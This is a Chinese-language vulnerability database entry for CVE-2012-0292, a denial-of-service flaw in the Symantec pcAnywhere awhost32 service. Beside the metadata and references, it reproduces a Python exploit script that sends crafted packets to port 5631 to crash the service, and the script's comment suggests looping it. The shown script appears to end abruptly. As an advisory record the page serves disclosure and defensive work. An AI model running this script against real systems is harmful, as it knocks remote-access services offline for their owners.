Symantec pcAnywhere输入验证漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1120900 漏洞类型 输入验证
发布时间 2012-02-17 更新时间 2012-04-09
CVE编号 CVE-2012-0292 CNNVD-ID CNNVD-201203-081
漏洞平台 Windows CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/18493
https://www.securityfocus.com/bid/52094
https://cxsecurity.com/issue/WLB-2012030062
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201203-081
|漏洞详情
SymantecpcAnywhere是一款功能强大的远程控制软件。SymantecpcAnywhere最初版本至12.5.3版本,AltirisITManagementSuitepcAnywhereSolution7.0版本(也称12.5.x版本)和7.1版本(也称12.6.x版本),AltirisITManagementSuitepcAnywhereSolution7.0版本(也称12.5.x版本)和7.1版本(也称12.6.x版本),和AltirisDeploymentSolutionRemotepcAnywhereSolution7.1版本(也称12.5.x版本和12.6.x版本)中的awhost32服务中存在漏洞。远程攻击者可利用该漏洞借助5631端口上的特制TCP会话,导致拒绝服务(守护进程崩溃)。
|漏洞EXP
#!/usr/bin/python

'''
Exploit Title:  PCAnywhere Nuke 
Date: 2/16/12
Author: Johnathan Norman  spoofy <at> exploitscience.org  or @spoofyroot
Version:  PCAnyWhere  (12.5.0 build 463) and below
Tested on: Windows
Description: The following code will crash the awhost32 service. It'll be respawned
so if you want to be a real  pain you'll need to loop this.. my inital impressions
are that controlling execuction will be a pain.
'''

import sys
import socket
import argparse


if len(sys.argv) != 2:
    print "[+] Usage: ./pcNuke.py <HOST>"
    sys.exit(1)
HOST = sys.argv[1]
PORT = 5631              
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))

    
# HELLO!
s.send("\x00\x00\x00\x00")
buf = s.recv(1024)


# ACK! 
s.send("\x6f\x06\xfe")
buf = s.recv(1024)


# Auth capability part 1 
s.send("\x6f\x62\xff\x09\x00\x07\x00\x00\x01\xff\x00\x00\x07\x00")
# Auth capability part 2
s.send("\x6f\x62\xff\x09\x00\x07\x00\x00\x01\xff\x00\x00\x07\x00")
|受影响的产品
Symantec Remote pcAnywhere Solution 12.6 + Symantec Altiris Client Management Suite 7 + Symantec Altiris Deployment Solution 7.1
|参考资料

来源:www.symantec.com
链接:http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120301_00
来源:BID
名称:52094
链接:http://www.securityfocus.com/bid/52094
来源:EXPLOIT-DB
名称:18493
链接:http://www.exploit-db.com/exploits/18493/